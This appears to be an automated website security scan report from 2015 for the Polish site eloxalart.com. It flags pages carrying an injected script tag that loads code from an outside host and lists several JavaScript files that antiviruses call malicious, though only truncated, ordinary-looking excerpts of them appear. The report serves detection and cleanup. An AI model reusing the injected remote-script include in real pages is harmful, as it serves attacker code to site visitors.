Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eloxalart.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://eloxalart.com/ | 200 OK Content-Length: 14180 Content-Type: text/html | suspicious |
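Suspicious code found: a script included from an external host (anthony.giambalvo.net rather than eloxalart.com). The same include, differing only in its id parameter, is reported for each HTML page in this table: <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950331"></script> | ||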
http://eloxalart.com/js/jquery.js | 200 OK Content-Length: 60327 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below; the antivirus list itself is not included in this copy of the report). The excerpt is truncated: it shows the start of the file followed by trailing comment markers, and the portion the antiviruses flagged does not appear to be included in it. (function(){if(window.jQuery)var _jQuery=window.jQuery;var jQuery=window.jQuery=function(selector,context){return new jQuery.prototype.init(selector,context);};if(window.$)var _$=window.$;window.$=jQuery;var quickExpr=/^[^<]*(<(.|\s) >)[^>]*$|^#(\w )$/;var isSimple=/^.[^:#\[\.]*$/;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}else if(typeof selector=="string"){var match=quickEx /*/a9a007*/) /*/339810*/ Antivirus reports:
| ||
http://eloxalart.com/js/DD_belatedPNG.js | 200 OK Content-Length: 18287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var DD_belatedPNG = { ns: 'DD_belatedPNG', imgSize: {}, delay: 10, nodesFixed: 0, createVmlNameSpace: function () { if (document.namespaces && !document.namespaces[this.ns]) { document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml'); } }, createVmlStyleSheet: function () { var screenStyleSheet, printStyleSheet; screenStyleSheet = document.createElement('style'); screenStyleSheet.setAttribute('media' 0*/ Antivirus reports:
| ||
http://eloxalart.com/js/jquery.lightbox-0.5.js | 200 OK Content-Length: 25846 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.lightBox = function(settings) { settings = jQuery.extend({ overlayBgColor: '#000', overlayOpacity: 0.8, fixedNavigation: false, imageLoading: 'images/lightbox-ico-loading.gif', imageBtnPrev: 'images/lightbox-btn-prev.gif', imageBtnNext: 'images/lightbox-btn-next.gif', imageBtnClose: 'images/lightbox-btn-close.gif', imageBlank: 'images/lightbox-blank.gif', containerBorderSize: 10, con Antivirus reports:
| ||
http://eloxalart.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 14286 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) /339810*/339810*/ Antivirus reports:
| ||
http://eloxalart.com/images/atest.jpg | 200 OK Content-Length: 68659 Content-Type: image/jpeg | clean |
http://eloxalart.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://eloxalart.com/kontakt.html | 200 OK Content-Length: 8385 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950334"></script> | ||
http://eloxalart.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 27936 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win = window, doc = document, nav = navigator, domLoadFnArr = [], regObjArr = [], timer = null, storedAltContent = null, storedAltContentId Antivirus reports:
| ||
http://eloxalart.com/index.html | 200 OK Content-Length: 14180 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950331"></script> | ||
http://eloxalart.com/nagrody.html | 200 OK Content-Length: 9865 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950355"></script> | ||
http://eloxalart.com/galeria.html | 200 OK Content-Length: 11913 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950326"></script> | ||
http://eloxalart.com/dystrybucja.html | 200 OK Content-Length: 10334 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950294"></script> | ||
http://eloxalart.com/montaz.html | 200 OK Content-Length: 11890 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950346"></script> | ||
http://eloxalart.com/mozliwosci.html | 200 OK Content-Length: 10880 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950350"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eloxalart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:32:39 GMT
Accept-Ranges: bytes
ETag: "8ec1c18-3764-509787007f7de"
Server: Apache
Content-Length: 14180
Content-Type: text/html
Last-Modified: Fri, 05 Dec 2014 13:56:03 GMT
...14180 bytes of data.
GET / HTTP/1.1
Host: eloxalart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:32:39 GMT
Accept-Ranges: bytes
ETag: "8ec1c18-3764-509787007f7de"
Server: Apache
Content-Length: 14180
Content-Type: text/html
Last-Modified: Fri, 05 Dec 2014 13:56:03 GMT
...14180 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eloxalart.com
Referer: http://www.google.com/search?q=eloxalart.com
Result:
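The response is similar to that of the first query; no suspicious redirects were found. Note that this comparison varies only the Referer header, so it does not rule out redirects that are conditional on other request properties.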
GET / HTTP/1.1
Host: eloxalart.com
Referer: http://www.google.com/search?q=eloxalart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.